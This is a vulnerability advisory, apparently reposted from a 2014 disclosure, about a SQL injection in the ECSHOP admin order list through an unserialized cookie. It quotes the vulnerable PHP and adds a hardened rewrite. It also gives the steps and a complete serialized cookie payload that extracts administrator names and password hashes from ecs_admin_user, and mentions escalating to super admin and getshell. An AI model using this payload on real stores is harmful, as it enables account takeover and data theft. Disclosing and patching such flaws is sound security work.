ECSHOP backend low-privilege SQL injection - vulnerability warning - the black bar safety net

2014-02-03T00:00:00
ID MYHACK58:62201442124
Type myhack58
Reporter 酱油甲@乌云
Modified 2014-02-03T00:00:00

Description

Brief description:

ECSHOP backend low-privilege SQL injection, one instance

Detailed description:

An ordinary shipping clerk, once logged in, needs nothing more than the order-list permission; with that low-privilege administrator account the injection can be used to obtain super administrator privileges.

Combined with file permissions, it is also possible to getshell.

The problem is in /admin/order.php:

if (!empty($_COOKIE['ECSCP']['lastfilter']))
{
    // $_COOKIE['ECSCP']['lastfilter'] is urldecode()d here, so any escaping
    // applied by GPC is undone before unserialize(). Poor GPC, alas...
    $filter = unserialize(urldecode($_COOKIE['ECSCP']['lastfilter']));

    if (!empty($filter['composite_status']))
    {
        $where = '';

        // General state
        switch ($filter['composite_status'])
        {
            case CS_AWAIT_PAY :
                $where .= order_query_sql('await_pay');
                break;

            case CS_AWAIT_SHIP :
                $where .= order_query_sql('await_ship');
                break;

            case CS_FINISHED :
                $where .= order_query_sql('finished');
                break;

            default:
                if ($filter['composite_status'] != -1)
                {
                    // composite_status is placed straight into the SQL string
                    $where .= "AND o.order_status = '$filter[composite_status]' ";
                }
        }
    }
}
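As an added example (not ECSHOP's own code), the same branch rewritten so that composite_status is validated as an integer before it can reach the query. The status constants and order_query_sql() are ECSHOP's; the placeholder definitions below exist only so the snippet runs stand-alone.

```php
<?php
// Added example, not ECSHOP's own code: hardened rewrite of the
// composite_status branch of /admin/order.php.
// Placeholder stubs for ECSHOP's constants and helper (assumed values).
if (!defined('CS_AWAIT_PAY'))  { define('CS_AWAIT_PAY', 100); }
if (!defined('CS_AWAIT_SHIP')) { define('CS_AWAIT_SHIP', 101); }
if (!defined('CS_FINISHED'))   { define('CS_FINISHED', 102); }
if (!function_exists('order_query_sql')) {
    function order_query_sql($type) { return "AND /* $type */ 1 "; }
}

function build_status_where(array $filter)
{
    // $filter is unserialize()d from the ECSCP[lastfilter] cookie, so every
    // value in it is attacker-controlled, whatever magic_quotes_gpc does.
    if (empty($filter['composite_status'])) {
        return '';
    }
    // order_status is a numeric column: accept only a well-formed integer.
    $status = filter_var($filter['composite_status'], FILTER_VALIDATE_INT);
    if ($status === false) {
        // A value like "1' and (select ..." is not an integer: drop the
        // filter instead of quoting it (worth logging as tampering).
        return '';
    }
    switch ($status) {
        case CS_AWAIT_PAY:  return order_query_sql('await_pay');
        case CS_AWAIT_SHIP: return order_query_sql('await_ship');
        case CS_FINISHED:   return order_query_sql('finished');
        default:
            // Only a validated int is interpolated, so no quote can break
            // out of the literal.
            return ($status != -1) ? "AND o.order_status = '$status' " : '';
    }
}

// Constructed inputs: a normal filter value and a tampered cookie value.
echo build_status_where(['composite_status' => '3']), "\n";
echo build_status_where(['composite_status' => "3' or '1'='1"]), "\n";
```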

------ Detailed process ------

  1. Click on the order list:


  2. Clicking sets three cookies. Modify ECSCP[lastfilter]; what is actually changed is composite_status:




The modified value, decoded, is:

a:28:{s:8:"order_sn";s:0:"";s:9:"consignee";s:0:"";s:5:"email";s:0:"";s:7:"address";s:0:"";s:7:"zipcode";s:0:"";s:3:"tel";s:0:"";s:6:"mobile";i:0;s:7:"country";i:0;s:8:"province";i:0;s:4:"city";i:0;s:8:"district";i:0;s:11:"shipping_id";i:0;s:6:"pay_id";i:0;s:12:"order_status";i:-1;s:15:"shipping_status";i:-1;s:10:"pay_status";i:-1;s:7:"user_id";i:0;s:9:"user_name";s:3:"333";s:16:"composite_status";s:200:"1' and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";s:12:"group_buy_id";i:0;s:7:"sort_by";s:8:"add_time";s:10:"sort_order";s:4:"DESC";s:10:"start_time";s:0:"";s:8:"end_time";s:0:"";s:4:"page";i:1;s:9:"page_size";i:15;s:12:"record_count";s:2:"19";s:10:"page_count";d:2;}
